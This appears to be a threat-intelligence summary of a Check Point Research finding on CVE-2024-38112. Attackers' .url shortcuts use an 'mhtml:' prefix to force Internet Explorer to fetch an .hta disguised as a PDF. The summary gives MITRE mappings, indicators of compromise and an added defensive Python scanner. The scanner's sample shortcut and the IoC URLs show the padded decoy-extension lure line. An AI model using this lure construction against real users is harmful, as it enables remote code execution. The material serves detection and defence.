Threat actors are leveraging Windows Internet Shortcut files (.url) to force IE to open attacker-controlled URLs, hiding an .hta payload and aiming for remote code execution on Windows 10/11. Check Point Research notes the use of an “mhtml” trick and IE-specific prompts; a Microsoft patch for CVE-2024-38112 mitigates these techniques. #CVE-2024-38112 #InternetShortcut #MHTMLTrick #HTA #InternetExplorer #cbmelipilla.cl #Windows10 #Windows11
Keypoints
- Threat actors use malicious .url shortcut files as an initial attack vector to lure Windows users toward remote code execution.
- The attack relies on an “mhtml” trick to have Internet Explorer (IE) open an attacker-controlled URL instead of a modern browser.
- The .url file appears to point to a PDF, but the real target is a malicious .hta file downloaded via IE.
- IE’s dialog prompts, including their “Protected Mode” wording, lower the user’s suspicion; if the user clicks through them, the attack chain continues.
- The technique could yield remote code execution, especially if an IE zero-day exploit exists, though samples analyzed did not show an IE RCE exploit.
- Microsoft released a patch for CVE-2024-38112; users are urged to apply it and to be wary of .url files from untrusted sources.
- Defense guidance includes proactive protections (e.g., IPS signatures) and vigilance against .url files; Check Point Research continues monitoring.
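The key points above describe the shape of the lure: a .url shortcut whose target carries an “mhtml” prefix (so IE handles it), a decoy .pdf name, and filler characters that push the real .hta extension out of sight (the percent-encoded padding is visible in the IoC URL further down). A static triage check for those three traits is a natural defensive control for mail gateways or endpoint scanners. The script below is an added example, not Check Point Research code; the sample shortcut text, the placeholder domain example.invalid, and the finding labels are constructed for illustration.

```python
"""Static triage of Windows Internet Shortcut (.url) files for the IE-invocation
pattern summarised above. Added example, not Check Point Research code; the
sample shortcut text and the placeholder domain are constructed."""
import re
import unicodedata
from urllib.parse import unquote

# Constructed sample: the "mhtml:" prefix is what routes the link to IE, and the
# percent-encoded U+2800 (braille blank) padding hides ".hta" behind a ".pdf" decoy.
SUSPICIOUS_URL_FILE = """[InternetShortcut]
URL=mhtml:http://example.invalid/te/Books_Sample.pdf%E2%A0%80%E2%A0%80%E2%A0%80.hta
ShowCommand=7
"""

# Constructed benign shortcut for comparison.
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://example.invalid/docs/report.pdf
"""

# Extensions that mean "this link fetches something Windows will run, not display".
RISKY_EXT = {"hta", "exe", "js", "jse", "vbs", "vbe", "wsf", "cmd", "bat", "scr", "ps1", "lnk", "url"}

# Characters that render as blank and can push a real extension out of view.
FILLER_CHARS = {"\u2800", "\u200b", "\u200c", "\u200d", "\u2060", "\ufeff", "\u00a0"}


def parse_url_file(text):
    """Return key -> value for the [InternetShortcut] section (keys lower-cased)."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    return fields


def is_filler(ch):
    """True for explicit filler characters and for any format/space-separator code point."""
    return ch in FILLER_CHARS or unicodedata.category(ch) in ("Cf", "Zs")


def analyze_url_file(text):
    """Return a list of findings for one .url file; an empty list means nothing matched."""
    findings = []
    target = parse_url_file(text).get("url", "")
    if target.lower().startswith("mhtml:"):
        findings.append("mhtml-prefix")           # IE is invoked instead of the default browser
        target = target[len("mhtml:"):]
    decoded = unquote(target)                    # make percent-encoded padding visible
    segment = decoded.rsplit("/", 1)[-1].split("?")[0].split("#")[0]
    if any(is_filler(ch) for ch in segment):
        findings.append("hidden-padding")         # blank glyphs between decoy and real extension
    exts = [e.lower() for e in re.findall(r"\.([A-Za-z0-9]{1,5})", segment)]
    if len(exts) >= 2 and exts[0] != exts[-1]:
        findings.append(f"decoy-extension:{exts[0]}->{exts[-1]}")
    if exts and exts[-1] in RISKY_EXT:
        findings.append(f"risky-target:{exts[-1]}")
    return findings


if __name__ == "__main__":
    for name, content in (("suspicious", SUSPICIOUS_URL_FILE), ("benign", BENIGN_URL_FILE)):
        print(name, analyze_url_file(content) or "no findings")
```

The percent-decoding step matters: scanned as raw bytes, the padding is just `%E2%A0%80` and a naive extension check sees `.hta` at the end of a long string, while a user sees a `.pdf` name. Decoding first lets the same rule catch both the invisible padding and the decoy/real extension pair. The `mhtml-prefix` finding alone is a strong signal on any host where IE has been retired, since no legitimate shortcut should need it.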
MITRE Techniques
- [T1204.002] User Execution – Malicious File – The victim double-clicks a .url shortcut, triggering IE to open an attacker-controlled URL; “the victim will get this: IE and a prompt window dialog appear when the victim double-clicks on the .url file”
- [T1218.005] Mshta – HTML Application (HTA) Execution – The downloaded file is executed as a malicious .hta; “the ‘opened’ file is actually a malicious .hta file being downloaded and executed.”
- [T1036] Masquerading – File extension/appearance deception – The .url file is presented to look like a PDF link to lure the user; “the malicious .url file appears as a link to a PDF file on Windows 11”
- [T1203] Exploitation for Client Execution – Exploiting client software (IE) to enable code execution – The attacker could gain remote code execution via an IE zero-day exploit; “If the attacker has an IE zero-day exploit … the attacker could attack the victim to gain remote code execution immediately.”
Indicators of Compromise
- [URL] attacker-controlled landing URL – http://cbmelipilla.cl/te/test1.html, https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80…hta
- [Domain] cbmelipilla.cl – Domain hosting attacker pages referenced in the .url file
- [File hash] sample .url artifacts (ITW) – bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0, b16aee58b7dfaf2a612144e2c993e29dcbd59d8c20e0fd0ab75b76dd9170e104, and 6 more hashes